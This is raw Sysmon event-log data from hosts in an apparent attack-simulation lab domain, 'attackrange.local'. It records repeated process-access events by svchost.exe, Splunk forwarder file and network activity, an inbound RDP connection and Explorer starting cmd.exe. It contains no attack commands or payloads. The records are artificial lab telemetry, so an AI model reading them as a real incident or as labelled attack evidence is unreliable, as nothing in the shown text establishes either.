07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001048848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.592{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51019-false10.0.1.12-8000- 23542300x80000000000000001048847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:00.964{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1BB4D1CFED1C79971863A47CAE382A5,SHA256=B767B2176D64A31138B7C9DAC79BE3F7DF474B22CE76F00B7E7DDB12433E74D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:00.227{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=928FAA5DB8BF00BD01F97EB80A00D2BE,SHA256=752ED4C212EDFEC16417BCD06542701C93282B9A371EFDDF3BD73E5C79056F4E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807506Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:00.276{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35FFAADF690BB5A8E14EE619CBC86848,SHA256=2A5AD51FDC30CFA135E1BEF85D718C5C004DE165D93056CF2BBFC2ABDC1D061A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807505Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:58.190{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57260-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001048849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:01.295{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807507Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:01.291{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6E65E02E0383055A6B949F2C3C527DB,SHA256=29B71461EF8F37BC35A17A20EA6A678C498998B8630F46CA8E24A731704D8DB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807508Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:02.338{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80AB6207E77D9F6A286B8B481E0C64A1,SHA256=BF6B49D9DD87E63FDFD073E595E171FE7C9B7F501C8EB2E0F35108F7F9D8B738,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:02.745{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5908B71AD457D4F41DA91769D0ECAB10,SHA256=A1DC0C1BE426B632ADA234FBF36D4ED891A9E38229F8A8FD1819BC7AD443CAD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:02.744{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19E3D1AAB6DD505E4B92B0DD074F7CB3,SHA256=C0F9937BEE3F0AC1C9A0C6FF11182BB72F76B8F0AD79D2AAB28B5FAFC4ED1330,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:01.996{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0ED915773161E93C9EB5B0E4CB111B,SHA256=AF9AE896BDF50859FBC116BB3C50EC172BCD0F20EB78A84E4D3C5794B8759621,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807509Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:03.401{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5538BA4B9D3E26473687D62399581C6B,SHA256=F2D2B24BF513A972D9D626B152A713D32DD853ADCAFBCDE06669885A2598BA43,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.948{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse95.53.247.168shpd-95-53-247-168.vologda.ru30539-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001048853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:03.027{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC57364381D7D6645E51AB0ECA198032,SHA256=59C9F2A789978ABD81653EE9E4591EFF80F4F2BDEADAB9765E972EFC74AB2DF8,IMPHASH=00000000000000000000000000000000falsetrue 